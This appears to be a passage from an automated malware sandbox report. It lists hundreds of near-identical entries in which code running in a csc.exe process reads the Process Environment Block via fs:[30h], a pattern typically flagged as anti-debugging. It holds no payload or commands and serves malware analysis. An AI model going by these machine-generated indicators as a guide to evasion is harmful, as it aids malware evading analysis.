Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FA660 mov eax, dword ptr fs:[00000030h]	5_2_055FA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F9660 mov eax, dword ptr fs:[00000030h]	5_2_055F9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F9660 mov eax, dword ptr fs:[00000030h]	5_2_055F9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C3616 mov eax, dword ptr fs:[00000030h]	5_2_055C3616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C3616 mov eax, dword ptr fs:[00000030h]	5_2_055C3616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D260B mov eax, dword ptr fs:[00000030h]	5_2_055D260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D260B mov eax, dword ptr fs:[00000030h]	5_2_055D260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D260B mov eax, dword ptr fs:[00000030h]	5_2_055D260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D260B mov eax, dword ptr fs:[00000030h]	5_2_055D260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D260B mov eax, dword ptr fs:[00000030h]	5_2_055D260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D260B mov eax, dword ptr fs:[00000030h]	5_2_055D260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D260B mov eax, dword ptr fs:[00000030h]	5_2_055D260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F1607 mov eax, dword ptr fs:[00000030h]	5_2_055F1607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FF603 mov eax, dword ptr fs:[00000030h]	5_2_055FF603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05695636 mov eax, dword ptr fs:[00000030h]	5_2_05695636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563E609 mov eax, dword ptr fs:[00000030h]	5_2_0563E609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C262C mov eax, dword ptr fs:[00000030h]	5_2_055C262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602619 mov eax, dword ptr fs:[00000030h]	5_2_05602619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DE627 mov eax, dword ptr fs:[00000030h]	5_2_055DE627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]	5_2_055BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]	5_2_055BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]	5_2_055BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]	5_2_055BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]	5_2_055BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]	5_2_055BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]	5_2_055BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]	5_2_055BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF626 mov eax, dword ptr fs:[00000030h]	5_2_055BF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F6620 mov eax, dword ptr fs:[00000030h]	5_2_055F6620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F8620 mov eax, dword ptr fs:[00000030h]	5_2_055F8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056536EE mov eax, dword ptr fs:[00000030h]	5_2_056536EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056536EE mov eax, dword ptr fs:[00000030h]	5_2_056536EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056536EE mov eax, dword ptr fs:[00000030h]	5_2_056536EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056536EE mov eax, dword ptr fs:[00000030h]	5_2_056536EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056536EE mov eax, dword ptr fs:[00000030h]	5_2_056536EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056536EE mov eax, dword ptr fs:[00000030h]	5_2_056536EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F16CF mov eax, dword ptr fs:[00000030h]	5_2_055F16CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563E6F2 mov eax, dword ptr fs:[00000030h]	5_2_0563E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563E6F2 mov eax, dword ptr fs:[00000030h]	5_2_0563E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563E6F2 mov eax, dword ptr fs:[00000030h]	5_2_0563E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563E6F2 mov eax, dword ptr fs:[00000030h]	5_2_0563E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056406F1 mov eax, dword ptr fs:[00000030h]	5_2_056406F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056406F1 mov eax, dword ptr fs:[00000030h]	5_2_056406F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0567D6F0 mov eax, dword ptr fs:[00000030h]	5_2_0567D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FA6C7 mov ebx, dword ptr fs:[00000030h]	5_2_055FA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FA6C7 mov eax, dword ptr fs:[00000030h]	5_2_055FA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CB6C0 mov eax, dword ptr fs:[00000030h]	5_2_055CB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CB6C0 mov eax, dword ptr fs:[00000030h]	5_2_055CB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CB6C0 mov eax, dword ptr fs:[00000030h]	5_2_055CB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CB6C0 mov eax, dword ptr fs:[00000030h]	5_2_055CB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CB6C0 mov eax, dword ptr fs:[00000030h]	5_2_055CB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CB6C0 mov eax, dword ptr fs:[00000030h]	5_2_055CB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0567F6C7 mov eax, dword ptr fs:[00000030h]	5_2_0567F6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056816CC mov eax, dword ptr fs:[00000030h]	5_2_056816CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056816CC mov eax, dword ptr fs:[00000030h]	5_2_056816CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056816CC mov eax, dword ptr fs:[00000030h]	5_2_056816CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056816CC mov eax, dword ptr fs:[00000030h]	5_2_056816CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F36EF mov eax, dword ptr fs:[00000030h]	5_2_055F36EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055ED6E0 mov eax, dword ptr fs:[00000030h]	5_2_055ED6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055ED6E0 mov eax, dword ptr fs:[00000030h]	5_2_055ED6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C4690 mov eax, dword ptr fs:[00000030h]	5_2_055C4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C4690 mov eax, dword ptr fs:[00000030h]	5_2_055C4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564368C mov eax, dword ptr fs:[00000030h]	5_2_0564368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564368C mov eax, dword ptr fs:[00000030h]	5_2_0564368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564368C mov eax, dword ptr fs:[00000030h]	5_2_0564368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564368C mov eax, dword ptr fs:[00000030h]	5_2_0564368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055B76B2 mov eax, dword ptr fs:[00000030h]	5_2_055B76B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055B76B2 mov eax, dword ptr fs:[00000030h]	5_2_055B76B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055B76B2 mov eax, dword ptr fs:[00000030h]	5_2_055B76B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F66B0 mov eax, dword ptr fs:[00000030h]	5_2_055F66B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BD6AA mov eax, dword ptr fs:[00000030h]	5_2_055BD6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BD6AA mov eax, dword ptr fs:[00000030h]	5_2_055BD6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FC6A6 mov eax, dword ptr fs:[00000030h]	5_2_055FC6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C6154 mov eax, dword ptr fs:[00000030h]	5_2_055C6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C6154 mov eax, dword ptr fs:[00000030h]	5_2_055C6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BC156 mov eax, dword ptr fs:[00000030h]	5_2_055BC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C7152 mov eax, dword ptr fs:[00000030h]	5_2_055C7152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055B9148 mov eax, dword ptr fs:[00000030h]	5_2_055B9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055B9148 mov eax, dword ptr fs:[00000030h]	5_2_055B9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055B9148 mov eax, dword ptr fs:[00000030h]	5_2_055B9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055B9148 mov eax, dword ptr fs:[00000030h]	5_2_055B9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05659179 mov eax, dword ptr fs:[00000030h]	5_2_05659179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05654144 mov eax, dword ptr fs:[00000030h]	5_2_05654144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05654144 mov eax, dword ptr fs:[00000030h]	5_2_05654144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05654144 mov ecx, dword ptr fs:[00000030h]	5_2_05654144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05654144 mov eax, dword ptr fs:[00000030h]	5_2_05654144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05654144 mov eax, dword ptr fs:[00000030h]	5_2_05654144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05653140 mov eax, dword ptr fs:[00000030h]	5_2_05653140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05653140 mov eax, dword ptr fs:[00000030h]	5_2_05653140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05653140 mov eax, dword ptr fs:[00000030h]	5_2_05653140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172 mov eax, dword ptr fs:[00000030h]	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05695152 mov eax, dword ptr fs:[00000030h]	5_2_05695152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05658158 mov eax, dword ptr fs:[00000030h]	5_2_05658158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C1131 mov eax, dword ptr fs:[00000030h]	5_2_055C1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C1131 mov eax, dword ptr fs:[00000030h]	5_2_055C1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BB136 mov eax, dword ptr fs:[00000030h]	5_2_055BB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BB136 mov eax, dword ptr fs:[00000030h]	5_2_055BB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BB136 mov eax, dword ptr fs:[00000030h]	5_2_055BB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BB136 mov eax, dword ptr fs:[00000030h]	5_2_055BB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F0124 mov eax, dword ptr fs:[00000030h]	5_2_055F0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05680115 mov eax, dword ptr fs:[00000030h]	5_2_05680115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0566A118 mov ecx, dword ptr fs:[00000030h]	5_2_0566A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0566A118 mov eax, dword ptr fs:[00000030h]	5_2_0566A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0566A118 mov eax, dword ptr fs:[00000030h]	5_2_0566A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0566A118 mov eax, dword ptr fs:[00000030h]	5_2_0566A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056961E5 mov eax, dword ptr fs:[00000030h]	5_2_056961E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FD1D0 mov eax, dword ptr fs:[00000030h]	5_2_055FD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FD1D0 mov ecx, dword ptr fs:[00000030h]	5_2_055FD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056671F9 mov esi, dword ptr fs:[00000030h]	5_2_056671F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056951CB mov eax, dword ptr fs:[00000030h]	5_2_056951CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F01F8 mov eax, dword ptr fs:[00000030h]	5_2_055F01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056861C3 mov eax, dword ptr fs:[00000030h]	5_2_056861C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056861C3 mov eax, dword ptr fs:[00000030h]	5_2_056861C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]	5_2_055E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]	5_2_055E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]	5_2_055E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]	5_2_055E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]	5_2_055E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]	5_2_055E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]	5_2_055E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]	5_2_055E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]	5_2_055E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]	5_2_055E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]	5_2_055E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]	5_2_055E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E51EF mov eax, dword ptr fs:[00000030h]	5_2_055E51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C51ED mov eax, dword ptr fs:[00000030h]	5_2_055C51ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563E1D0 mov eax, dword ptr fs:[00000030h]	5_2_0563E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563E1D0 mov eax, dword ptr fs:[00000030h]	5_2_0563E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563E1D0 mov ecx, dword ptr fs:[00000030h]	5_2_0563E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563E1D0 mov eax, dword ptr fs:[00000030h]	5_2_0563E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563E1D0 mov eax, dword ptr fs:[00000030h]	5_2_0563E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056711A4 mov eax, dword ptr fs:[00000030h]	5_2_056711A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056711A4 mov eax, dword ptr fs:[00000030h]	5_2_056711A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056711A4 mov eax, dword ptr fs:[00000030h]	5_2_056711A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056711A4 mov eax, dword ptr fs:[00000030h]	5_2_056711A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BA197 mov eax, dword ptr fs:[00000030h]	5_2_055BA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BA197 mov eax, dword ptr fs:[00000030h]	5_2_055BA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BA197 mov eax, dword ptr fs:[00000030h]	5_2_055BA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05600185 mov eax, dword ptr fs:[00000030h]	5_2_05600185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DB1B0 mov eax, dword ptr fs:[00000030h]	5_2_055DB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0567C188 mov eax, dword ptr fs:[00000030h]	5_2_0567C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0567C188 mov eax, dword ptr fs:[00000030h]	5_2_0567C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05617190 mov eax, dword ptr fs:[00000030h]	5_2_05617190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564019F mov eax, dword ptr fs:[00000030h]	5_2_0564019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564019F mov eax, dword ptr fs:[00000030h]	5_2_0564019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564019F mov eax, dword ptr fs:[00000030h]	5_2_0564019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564019F mov eax, dword ptr fs:[00000030h]	5_2_0564019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05695060 mov eax, dword ptr fs:[00000030h]	5_2_05695060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564106E mov eax, dword ptr fs:[00000030h]	5_2_0564106E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C2050 mov eax, dword ptr fs:[00000030h]	5_2_055C2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EB052 mov eax, dword ptr fs:[00000030h]	5_2_055EB052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563D070 mov ecx, dword ptr fs:[00000030h]	5_2_0563D070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]	5_2_055D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D1070 mov ecx, dword ptr fs:[00000030h]	5_2_055D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]	5_2_055D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]	5_2_055D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]	5_2_055D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]	5_2_055D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]	5_2_055D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]	5_2_055D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]	5_2_055D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]	5_2_055D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]	5_2_055D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]	5_2_055D1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D1070 mov eax, dword ptr fs:[00000030h]	5_2_055D1070
